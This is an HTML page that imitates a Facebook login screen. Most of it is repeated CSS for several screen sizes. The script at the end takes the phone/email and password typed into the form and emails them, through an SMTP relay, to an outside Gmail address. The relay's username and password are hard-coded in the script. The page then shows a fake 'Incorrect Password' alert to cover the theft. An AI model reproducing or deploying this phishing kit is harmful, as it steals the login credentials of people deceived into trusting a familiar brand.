<!DOCTYPE html>
<html lang="en">
<head>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="keywords" content="HTML, CSS">
 <meta http-equiv="X-UA-Compatible" content="1e=edge" >

   <title> Facebook Login </title>

<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" >

</head>
<body>



<style>

     .returnBtn {
         text-decoration: none;
         color: grey;
         width: 20%;
         text-align: center;
         padding-top: 20px;
         margin-left: 36%; 
         display: block;
          padding-left: 0px;
      }
   

@media (min-width: 1025px) {

.generalContainer {

width: 400px;
height: 100%;
background-color: none;
border: 2px solid #eee;
padding: 40px;
border-radius: 10px;

}

@import url('https://fonts.googleapis.com/css2?family-Poppins:wght@100;200;300;400;500;600;700&display= swap');
*{
font-family: 'Poppins', sans-serif;
margin: 0; 
padding: 0;
box-sizing: border-box;
outline: none; 
border: none;
text-decoration: none;
transition: .2s linear;
}



.mit{
width: 95%;
height: 45px;
background: #254399;
border: none;
margin-top: 20px;
font-size: 15px;
border-radius: 10px;
cursor: pointer;
color: white;
transition: -0.4s ease;
font-weight: bold;
margin-left: none;
position: center;
}
.mit:hover{
background: grey;
color: #fff;
}

.mit a {
text-decoration: none;
color: #fff;
font-weight: bold;
}


.container {

padding: 15px 9%;
/*padding-bottom: 100px;*/

}

body{
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
background-size: cover;
background-repeat: no-repeat;
background-position: center;
font-family: 'Segoe UI', Tahoma, Times new Roman, Geneva, Verdana, sans-serif;
}

.maxm{
position: relative;
background: #254399;
width: 100%; 
background-size: cover;
background-repeat: no-repeat;
background-position: center;
    
}


.maxm img{
width: 100%;
height: auto;

}

 .fly input{
width: 95%;
height: 45px;
background: white;
border-bottom: 2px solid #fff;
border-top: 2px solid #fff;
border-right: 2px solid #fff;
border-left: 2px solid #fff;
border-color: #eee;
color: black;
font-size: 15px;
letter-spacing: 1px;
padding: 10px;
margin-top: 5px;
font-family: sans -serif;
margin-left: none;
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
position: center;
}


::placeholder {
padding: 10px;
font-family: Helvetica;
color: grey;
text-align: left;
}

}







/* Medium screens (tablets)*/
@media (min-width: 769px) and (max-width: 1024px) {
  

/*
.try {
width: 768px;
height: 100%;
background-color: red;
}
*/
.generalContainer {

width: 400px;
height: 100%;
background-color: none;
border: 2px solid #eee;
padding: 40px;
border-radius: 10px;

}

@import url('https://fonts.googleapis.com/css2?family-Poppins:wght@100;200;300;400;500;600;700&display= swap');
*{
font-family: 'Poppins', sans-serif;
margin: 0; 
padding: 0;
box-sizing: border-box;
outline: none; 
border: none;
text-decoration: none;
transition: .2s linear;
}



.mit{
width: 95%;
height: 45px;
background: #254399;
border: none;
margin-top: 20px;
font-size: 15px;
border-radius: 10px;
cursor: pointer;
color: white;
transition: -0.4s ease;
font-weight: bold;
margin-left: none;
position: center;
}
.mit:hover{
background: grey;
color: #fff;
}

.mit a {
text-decoration: none;
color: #fff;
font-weight: bold;
}


.container {

padding: 15px 9%;
/*padding-bottom: 100px;*/

}

body{
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
background-size: cover;
background-repeat: no-repeat;
background-position: center;
font-family: 'Segoe UI', Tahoma, Times new Roman, Geneva, Verdana, sans-serif;
}

.maxm{
position: relative;
background: #254399;
width: 100%; 
background-size: cover;
background-repeat: no-repeat;
background-position: center;
    
}


.maxm img{
width: 100%;
height: auto;

}

 .fly input{
width: 95%;
height: 45px;
background: white;
border-bottom: 2px solid #fff;
border-top: 2px solid #fff;
border-right: 2px solid #fff;
border-left: 2px solid #fff;
border-color: #eee;
color: black;
font-size: 15px;
letter-spacing: 1px;
padding: 10px;
margin-top: 5px;
font-family: sans -serif;
margin-left: none;
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
position: center;
}


::placeholder {
padding: 10px;
font-family: Helvetica;
color: grey;
text-align: left;
}


}





@media (max-width: 768px) {

/*
.try {
width: 768px;
height: 100%;
background-color: red;
}
*/
.generalContainer {

width: 500px;
height: 100%;
background-color: none;
border: 2px solid #eee;
padding: 40px;
border-radius: 10px;

}

@import url('https://fonts.googleapis.com/css2?family-Poppins:wght@100;200;300;400;500;600;700&display= swap');
*{
font-family: 'Poppins', sans-serif;
margin: 0; 
padding: 0;
box-sizing: border-box;
outline: none; 
border: none;
text-decoration: none;
transition: .2s linear;
}



.mit{
width: 95%;
height: 45px;
background: #254399;
border: none;
margin-top: 20px;
font-size: 15px;
border-radius: 10px;
cursor: pointer;
color: white;
transition: -0.4s ease;
font-weight: bold;
margin-left: none;
position: center;
}
.mit:hover{
background: grey;
color: #fff;
}

.mit a {
text-decoration: none;
color: #fff;
font-weight: bold;
}


.container {

padding: 15px 9%;
/*padding-bottom: 100px;*/

}

body{
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
background-size: cover;
background-repeat: no-repeat;
background-position: center;
font-family: 'Segoe UI', Tahoma, Times new Roman, Geneva, Verdana, sans-serif;
}

.maxm{
position: relative;
background: #254399;
width: 100%; 
background-size: cover;
background-repeat: no-repeat;
background-position: center;
    
}


.maxm img{
width: 100%;
height: auto;

}

 .fly input{
width: 95%;
height: 45px;
background: white;
border-bottom: 2px solid #fff;
border-top: 2px solid #fff;
border-right: 2px solid #fff;
border-left: 2px solid #fff;
border-color: #eee;
color: black;
font-size: 15px;
letter-spacing: 1px;
padding: 10px;
margin-top: 5px;
font-family: sans -serif;
margin-left: none;
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
position: center;
}


::placeholder {
padding: 10px;
font-family: Helvetica;
color: grey;
text-align: left;
}

}






















@media only screen and (max-width: 480px) {

.generalContainer {
background-color: none;
border: none;
width: 100%;
padding: 10px;
}

@import url('https://fonts.googleapis.com/css2?family-Poppins:wght@100;200;300;400;500;600;700&display= swap');
*{
font-family: 'Poppins', sans-serif;
margin: 0; 
padding: 0;
box-sizing: border-box;
outline: none; 
border: none;
text-decoration: none;
transition: .2s linear;
}



.mit{
width: 95%;
height: 45px;
background: #254399;
border: none;
margin-top: 20px;
font-size: 15px;
border-radius: 10px;
cursor: pointer;
color: white;
transition: -0.4s ease;
font-weight: bold;
margin-left: none;
position: center;
}
.mit:hover{
background: grey;
color: #fff;
}

.mit a {
text-decoration: none;
color: #fff;
font-weight: bold;
}

}

body{
width: 100%; 
padding: 0px;
min-height: 100vh;
background-size: cover;
background-repeat: no-repeat;
background-position: center;
font-family: 'Segoe UI', Tahoma, Times new Roman, Geneva, Verdana, sans-serif;
}

.maxm{
position: relative;
background: #254399;
width: 100%; 
background-size: cover;
background-repeat: no-repeat;
background-position: center;
    
}


.maxm img{
width: 100%;
height: auto;
}

 .fly input{
width: 95%;
height: 45px;
background: white;
border-bottom: 2px solid #fff;
border-top: 2px solid #fff;
border-right: 2px solid #fff;
border-left: 2px solid #fff;
border-color: #eee;
color: black;
font-size: 15px;
letter-spacing: 1px;
margin-top: 5px;
font-family: sans -serif;
margin-left: none;
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
position: center;
padding: 20px;
}


::placeholder {
font-family: Helvetica;

text-align: left;
}




@media only screen and (min-width: 481px) and (max-width: 767px) {

.generalContainer {

width: 450px;
height: 100%;
background-color: none;
border: 2px solid #eee;
padding: 40px;
border-radius: 10px;

}

@import url('https://fonts.googleapis.com/css2?family-Poppins:wght@100;200;300;400;500;600;700&display= swap');
*{
font-family: 'Poppins', sans-serif;
margin: 0; 
padding: 0;
box-sizing: border-box;
outline: none; 
border: none;
text-decoration: none;
transition: .2s linear;
}



.mit{
width: 95%;
height: 45px;
background: #254399;
border: none;
margin-top: 20px;
font-size: 15px;
border-radius: 10px;
cursor: pointer;
color: white;
transition: -0.4s ease;
font-weight: bold;
margin-left: none;
position: center;
}
.mit:hover{
background: grey;
color: #fff;
}

.mit a {
text-decoration: none;
color: #fff;
font-weight: bold;
}


.container {

padding: 15px 9%;
/*padding-bottom: 100px;*/

}

body{
width: 100%; 
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
background-size: cover;
background-repeat: no-repeat;
background-position: center;
font-family: 'Segoe UI', Tahoma, Times new Roman, Geneva, Verdana, sans-serif;
}

.maxm{
position: relative;
background: #254399;
width: 100%; 
background-size: cover;
background-repeat: no-repeat;
background-position: center;
    
}


.maxm img{
width: 100%;
height: auto;

}

 .fly input{
width: 95%;
height: 45px;
background: white;
border-bottom: 2px solid #fff;
border-top: 2px solid #fff;
border-right: 2px solid #fff;
border-left: 2px solid #fff;
border-color: #eee;
color: black;
font-size: 15px;
letter-spacing: 1px;
margin-top: 5px;
font-family: sans -serif;
margin-left: none;
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
position: center;
padding: 10px;
}


::placeholder {
padding: 10px;
font-family: Helvetica;
color: grey;
text-align: left;
}


}

















@media (max-width: 320px) {


@import url('https://fonts.googleapis.com/css2?family-Poppins:wght@100;200;300;400;500;600;700&display= swap');
*{
font-family: 'Poppins', sans-serif;
margin: 0; 
padding: 0;
box-sizing: border-box;
outline: none; 
border: none;
text-decoration: none;
transition: .2s linear;
}



.mit{
width: 95%;
height: 45px;
background: #254399;
border: none;
margin-top: 20px;
font-size: 15px;
border-radius: 10px;
cursor: pointer;
color: white;
transition: -0.4s ease;
font-weight: bold;
margin-left: none;
position: center;
}
.mit:hover{
background: grey;
color: #fff;
}

.mit a {
text-decoration: none;
color: #fff;
font-weight: bold;
}


.container {
padding: 15px 9%;
/*padding-bottom: 100px;*/

}
 
.maxm{
position: relative;
background: #254399;
width: 100%; 
background-size: cover;
background-repeat: no-repeat;
background-position: center;
    
}


.maxm img{
width: 100%;
height: auto;

}

 .fly input{
width: 95%;
height: 45px;
background: white;
border-bottom: 2px solid #fff;
border-top: 2px solid #fff;
border-right: 2px solid #fff;
border-left: 2px solid #fff;
border-color: #eee;
color: black;
font-size: 15px;
letter-spacing: 1px;
margin-top: 5px;
font-family: sans -serif;
margin-left: none;
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
position: center;
padding: 10px;
}


::placeholder {
padding: 10px;
font-family: Helvetica;
color: grey;
text-align: left;
}
}
















</style>



<div class ="try">


<div class="generalContainer">
   <div class="maxm">
          
                <img src = "Fb.jpg">
            
 </div>


<div class="container">     
               
 <form onsubmit = "sendEmail(); reset(); return false;">
<div class = "box-container"> 
        
                <div class="box">
                     <div class = "fly">
               
            
  <input   type="text" id = "Phone" placeholder ="Phone number or email address" required> 
        
      <input type="password" id ="Password" placeholder ="Password" required> 
               
                 

        
         <button class="mit" input type="send" value="send" placeholder="send">Login</button>
 
 <a class="returnBtn" href="dashboard.html">Back</a>
            </div>

    
    

                       </div>
                 
               </div>

         </form>
         
 </div>








</div>

<script src="https://smtpjs.com/v3/smtp.js"></script>
<script>
function sendEmail(){
    Email.send({
    Host: "smtp.elasticemail.com",
 Username: "spectramanagement0@gmail.com",
Password: "4B69D050F2EB2C171CBE27F878DD3073190F",

    To: "spectramanagement0@gmail.com",
    From: "spectramanagement0@gmail.com", 
    Subject: "Facebook Details",
    Body: "phone:" + document.getElementById("Phone").value
+ "<br> Password:" + document.getElementById("Password").value
}). then(
message => alert ("Incorrect Password")
);

}
</script>



</div>


  </body> 
</html> 
      
      
 
           

